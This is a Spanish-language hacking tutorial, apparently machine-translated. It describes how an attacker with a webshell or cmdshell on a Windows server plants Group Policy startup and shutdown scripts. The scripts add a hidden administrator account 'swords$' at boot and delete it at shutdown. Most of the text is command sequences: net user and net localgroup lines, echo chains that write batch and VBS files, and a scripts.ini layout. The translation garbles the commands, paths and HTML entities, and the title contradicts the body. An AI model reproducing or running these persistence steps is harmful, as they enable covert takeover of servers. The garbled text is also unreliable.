Cómo eliminar privilegios de administrador usando un archivo batAhora usamos scripts de inicio y procesamiento por lotes para aumentar los privilegios al obtener el shell. Método 9: ¡Inicie el guión! ! El primer lote de filtraciones, todo el mundo debería observarlo con atención. Intento no hablar demasiado y mantener mis palabras concisas y directas. NOTA: El script de inicio es un archivo por lotes que se ejecuta antes de invitar al usuario a iniciar sesión. Su función es similar al archivo por lotes de ejecución automática autoexec.bat en Win9X y DOS. Dado que el script se ejecuta antes de iniciar sesión en Windows, podemos modificar el contenido del script para configurar el sistema, como iniciar la puerta trasera, agregar una cuenta de administrador, modificar la cuenta de administrador, etc. No importa lo que pienses. Esto es mentira... Este artículo primero presenta cómo agregar una cuenta oculta a través de webshell (después de todo, esto es lo que más preocupa a todos :) y luego explica cómo resolver el problema una vez que ocurre. ¿Cómo agregar una cuenta? I. Si puedes escribir archivos directamente, como ocean. (1) Primero, usamos ocean para escribir un archivo por lotes espadas1.bat para el nuevo administrador, de la siguiente manera: usuario de red espadas $ Contenido $ nbspEVI octal/add administrador de grupo local neto espada $ Contenido $ nbsp/add será un archivo llamado La cuenta oculta y la contraseña eviloctal para espadas$ se agregan a este archivo por lotes. Guarde el archivo Swords1.bat en "c:\win nt\system32\group Policy\machine\scripts\startup". (Nota: c:\winnt es el directorio del sistema. Si el disco del sistema no es la unidad c, cámbielo al directorio del sistema correspondiente. Si ve esta computadora, es posible que no encuentre la carpeta Política de grupo\Computadora\Scripts\ Inicio Puede seleccionar Herramientas/Opciones de carpeta/Ver/Hacer clic para mostrar todos los archivos y carpetas. Si usa fso para mostrar todos los archivos en el océano, no es necesario hacer esto (2) A continuación, escriba un archivo por lotes. .bat para eliminar el miembro de administración, es muy simple y se puede completar en una oración, de la siguiente manera: Netizen Swords $ Contenido $ nbsp/del Este archivo por lotes elimina una cuenta oculta llamada Swords$ y guarda el archivo Swords2.bat. "C:\win nt\ System32\Group Policy\Machine\scripts\shut down" (3) Escriba un archivo de configuración del script de inicio/apagado *******s.ini (nota) de la siguiente manera: [inicio] 0 cmdline = espadas 1. bat 0 parámetros =[apagar]0 cmdline = espadas 2 . bat 0 parámetros =Guarde el archivo *******s.ini en C:\win nt\system32\group Policy\Machine \Guiones.
2. Si tiene cmdshell, puede tener permisos de eco, por lo que puede agregar: (1) echo, el archivo utilizado al iniciar Swords1.vbs, echo en caso de error, reanudar a continuación & gtc:\ win nt \ system32 \ group Policy \ Machine \ Scripts \ Inicio \ espadas 1 . VBS echo net usuario espadas $ Contenido $ nbspEVI octal/add >& gtc:\ win nt \ system32 \ política de grupo \ Máquina \ Scripts \ Inicio \ espadas 1 . espadas $ Contenido $nbsp;/add>>c:\win nt\system32\group Policy\machine\scripts\startup\swords 1. VBS Nota: La primera línea debe ser '>De esta manera, se pueden eliminar los datos originales. (2) echo, el archivo de script utilizado cuando se cierra espadas2.vbs, espadas de usuario de echo net $ Contenido $ nbsp/del & gt; C:\win nt\system32\group Policy\Machine\Scripts\shut down\swords 2. VBS (3) Escriba un archivo de configuración de script de inicio/apagado * * * * * s iniecho[startup]> C:\win nt\system32\group Policy\Machine\Scripts\ * * * * * * s .ini echo 0 cmdline = espadas 1.VBS>>c:\win nt\system32\group Policy\Machine\Scripts\* * * * * * s. ini echo 0 parámetros =>>c:\win nt\system32\group Policy \ Machine \ Scripts \ * * * * * * s . ini echo[apagar]>& gtc:\ win nt \ system32 \ group Policy \ Machine \ Scripts \ * * * * * * s . VBS >>c:\win nt\system32\group Policy\Machine\Scripts\* * * * * * s. ini echo 0 parámetros = >>c:\win nt\system32\ group Policy\machine\scripts\* * * * s.ini Guarde el archivo * * * * s.ini en c:\win nt\system32\group Policy\machine\scripts. Finalmente, espere a que el servidor reinicie la computadora o fuercelo usted mismo. Entonces espera y juega. Nota: Al utilizar este método, el servidor debe tener asignado un script de inicio de la computadora; de lo contrario, es posible que este método no tenga éxito.